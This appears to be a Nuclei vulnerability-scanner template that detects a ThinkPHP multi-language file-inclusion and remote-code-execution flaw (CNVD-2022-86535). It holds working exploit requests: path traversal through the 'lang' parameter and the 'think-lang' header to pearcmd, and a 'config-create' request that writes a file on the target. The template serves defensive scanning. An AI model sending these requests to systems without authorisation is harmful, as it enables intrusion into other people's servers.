id: CNVD-2022-86535

info:
  name: ThinkPHP Multi Languag - File Inc & Remote Code Execution (RCE)
  author: arliya,ritikchaddha
  severity: high
  description: |
    ThinkPHP has a command execution vulnerability because the multi-language function is enabled and the parameter passing of parameter lang is not strictly filtered. Attackers can use this vulnerability to execute commands.
  reference:
    - https://cn-sec.com/archives/1465289.html
    - https://blog.csdn.net/qq_60614981/article/details/128724640
    - https://www.cnvd.org.cn/flaw/show/CNVD-2022-86535
  metadata:
    verified: true
    max-request: 3
  tags: cnvd,cnvd2022,thinkphp,rce

http:
  - raw:
      - |
        GET /?lang=../../../../../usr/local/php/pearcmd HTTP/1.1
        Host: {{Hostname}}
      - |
        GET / HTTP/1.1
        Host: {{Hostname}}
        think-lang: ../../../../../usr/local/php/pearcmd
      - |
        GET /?+config-create+/&lang=../../../../../../../../../../../usr/local/lib/php/pearcmd&/safedog()+{{rand_base(10)}}.log HTTP/1.1
        Host: {{Hostname}}

    matchers-condition: or
    matchers:
      - type: word
        part: set_cookie
        words:
          - "think_lang=..%2F..%2F..%2F..%2F"

      - type: word
        part: body_3
        words:
          - "CONFIGURATION"
          - "Successfully created"
        condition: and

# digest: 4a0a00473045022061630427dd72328900e8eb0f4d67c91f2c826690524c1c973c1cfe5b64400926022100c6c345fd5fbcc3038eaec942397faf5b9658b328bbb421f95eb3d2146d7f0cd7:922c64590222798bb761d5b6d8e72950